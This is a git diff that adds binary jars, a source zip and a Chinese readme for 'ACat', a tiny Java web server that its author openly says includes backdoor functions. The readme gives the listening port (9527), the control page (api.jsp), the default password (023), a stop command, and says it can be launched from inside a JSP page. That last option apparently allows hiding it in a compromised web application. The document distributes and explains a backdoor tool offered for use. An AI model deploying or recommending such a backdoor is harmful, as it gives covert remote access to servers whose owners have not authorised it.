diff --git a/other/acat/ACat-src.zip b/other/acat/ACat-src.zip new file mode 100644 index 0000000..ce08bbc Binary files /dev/null and b/other/acat/ACat-src.zip differ diff --git a/other/acat/ACat-附数据库驱动-jdk1.5.jar b/other/acat/ACat-附数据库驱动-jdk1.5.jar new file mode 100644 index 0000000..7b3694f Binary files /dev/null and b/other/acat/ACat-附数据库驱动-jdk1.5.jar differ diff --git a/other/acat/ACat-附数据库驱动.jar b/other/acat/ACat-附数据库驱动.jar new file mode 100644 index 0000000..8e45b50 Binary files /dev/null and b/other/acat/ACat-附数据库驱动.jar differ diff --git a/other/acat/ACat.jar b/other/acat/ACat.jar new file mode 100644 index 0000000..ef92f54 Binary files /dev/null and b/other/acat/ACat.jar differ diff --git a/other/acat/ACat_jdk1.5.jar b/other/acat/ACat_jdk1.5.jar new file mode 100644 index 0000000..c51125e Binary files /dev/null and b/other/acat/ACat_jdk1.5.jar differ diff --git a/other/acat/readme.md b/other/acat/readme.md new file mode 100644 index 0000000..cf2e53e --- /dev/null +++ b/other/acat/readme.md @@ -0,0 +1,24 @@ +Author:园长MM + + +下载: +ACat-jdk1.5.jar、ACat-附数据库驱动-jdk1.5.jar、 ACat-jdk.1.7.jar、ACat-附数据库驱动.jar + +源码: +ACat-src.zip + +描述: + +这是一个用java实现的非常小(18kb)的webServer。之前在drops发了一个简单的demo:http://drops.wooyun.org/papers/869。这个也非常简单,只实现了几个servlet的api,不过已实现了后门相关的其他功能。启动成功后会开启9527端口,然后访问:http://xxx.com:9527/api.jsp,密码:023。 + +停止服务:http://xxx.com:9527/api.jsp?action=stop + +密码和端口配置在jar里面的server.properties: + + + +运行方式:java -jar ACat.jar或者在jsp里面调用。 + + + +如果需要连接数据库需要下载:ACat-附数据库驱动.jar,或者自行添加相关jar。 \ No newline at end of file